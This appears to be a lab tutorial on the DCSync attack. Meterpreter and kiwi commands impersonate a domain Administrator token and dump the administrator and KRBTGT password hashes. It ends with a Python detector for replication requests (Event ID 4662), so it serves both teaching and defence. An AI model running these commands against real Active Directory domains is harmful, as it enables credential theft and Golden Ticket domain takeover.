DCSync with Metasploit: from NT AUTHORITY\SYSTEM to Administrator
A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.
These attacks abuse a function that Active Directory cannot do without, which makes them hard to prevent. Large networks need many DCs, and each of those DCs needs up-to-date information, so there has to be a mechanism that lets one DC push changes, including updated credential material, to another.
Attackers subvert that mechanism by pretending to be a DC and issuing a GetNCChanges request (IDL_DRSGetNCChanges in MS-DRSR) to pull password hashes. A common use of this technique is retrieving the KRBTGT hash, which is one step away from forging a Kerberos "golden ticket."
DCSync requires a compromised account that holds the domain replication rights (by default, Domain Admins, Enterprise Admins, Administrators and the DC computer accounts). With that in hand, one can locate a domain controller, ask it to replicate, and read the password hashes out of its response.
Initial
#interact with the existing Meterpreter session (the one running as NT AUTHORITY\SYSTEM)
sessions -i 1
shell
whoami
hostname
exit
We are going to impersonate the Administrator
use incognito
#to list all the available user tokens that we can impersonate
list_tokens -u
#the backslash separating domain and username has to be escaped, so write \\Administrator
impersonate_token north.newyork.local\\Administrator
getuid
load kiwi
help
We are going to dump the administrator HASHED Password
dcsync north\\administrator

We are going to dump the KRBTGT HASHED Password
#KRBTGT is the service account for the Key Distribution Service.
dcsync north\\krbtgt

DCSync is an attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication. The classic use for DCSync is as a precursor to a Golden Ticket attack, as it can be used to retrieve the KRBTGT hash.
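Since DCSync rides on a legitimate replication request, the defensive signal is who asked for replication rather than that replication happened. The detector below is an added example, not part of the original notes: it scans Windows Security Event ID 4662 records for the replication extended rights and flags any requester that is not a known domain controller account. The log format, the DC account names and the event lines are all constructed for the example.

```python
# Added example (not from the original notes): flag DCSync-style replication
# requests in Windows Security Event ID 4662 records. All events below are
# constructed sample records in a flattened key=value; format, not real logs.
import re

# Extended rights a DCSync request needs on the domain naming context
# (well-known control-access right GUIDs from the AD schema).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that are expected to replicate: the DC computer accounts (hypothetical names).
KNOWN_DC_ACCOUNTS = {"NORTH\\DC01$", "NORTH\\DC02$"}

GUID_RE = re.compile(r"\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)

def parse_event(line):
    """Parse one flattened 'key=value;' 4662 record (constructed format) into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split(";") if "=" in kv)

def is_dcsync_candidate(event):
    """Return (flag, reason) for one parsed event. AccessMask 0x100 is Control Access."""
    if event.get("EventID") != "4662" or event.get("AccessMask") != "0x100":
        return False, "not a control-access (0x100) directory service event"
    guids = [g.lower() for g in GUID_RE.findall(event.get("Properties", ""))]
    rights = [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]
    if not rights:
        return False, "no replication extended right requested"
    account = f"{event.get('SubjectDomainName')}\\{event.get('SubjectUserName')}"
    if account.upper() in KNOWN_DC_ACCOUNTS:
        return False, f"{account} is a known domain controller"
    return True, f"{account} requested {', '.join(rights)}"

def scan(lines):
    """Return the alert reason for every suspicious event in the input lines."""
    return [reason for flag, reason in (is_dcsync_candidate(parse_event(l)) for l in lines) if flag]

SAMPLE_EVENTS = [  # constructed: a DC replicating, a user account replicating, an unrelated read
    "EventID=4662;SubjectDomainName=NORTH;SubjectUserName=DC01$;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectDomainName=NORTH;SubjectUserName=Administrator;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectDomainName=NORTH;SubjectUserName=jdoe;AccessMask=0x20;Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Auditing of 4662 only fires if a SACL on the domain object covers these rights, so confirm the "Directory Service Access" subcategory is enabled before relying on this.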